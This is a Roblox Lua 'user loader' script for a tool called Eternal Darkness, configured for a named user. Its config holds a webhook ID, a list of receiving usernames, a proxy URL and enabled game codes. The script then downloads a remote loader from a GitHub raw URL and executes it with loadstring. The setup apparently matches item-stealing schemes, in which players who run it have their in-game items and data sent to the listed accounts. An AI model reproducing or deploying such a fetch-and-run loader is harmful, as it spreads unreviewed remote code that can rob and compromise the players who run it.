-- Eternal Darkness User Loader v9.0
-- Generated for: "itsaro_"
-- File ID: "c7ee5ea623516f99c1a585565a1e887c"

_G.ED_CONFIG = {
    WEBHOOK_ID = "a33ea9e3962a34e15a7726eaea66eea5",
    USERNAMES = {"Yujmnnggtrr"},
    PROXY_URL = "https://eternal-darkness.org/apis/proxy/",
    USERNAME = "itsaro_",
    ENABLED_GAMES = {["mm2"]=true,["ps99"]=true,["adm"]=true,["sab"]=true,["gag2"]=true,["sp"]=true,["bb"]=true,},
    CUSTOM_SCRIPTS = {}
}

local MainLoaderUrl = "https://raw.githubusercontent.com/outhackernuls090-hash/eternal/refs/heads/main/loader.lua"
local Success, Result = pcall(function()
    return game:HttpGet(MainLoaderUrl, true)
end)
if not Success or not Result or #Result == 0 then
    warn("[ED] Failed to load Main Loader")
    return
end
local _fn = (loadstring or load)(Result)
if type(_fn) == 'function' then
    local ok, _err = pcall(_fn)
    if not ok then warn('[ED] Error executing main loader: '..tostring(_err)) end
else
    warn('[ED] loadstring/load not available, cannot execute loaded code')
end
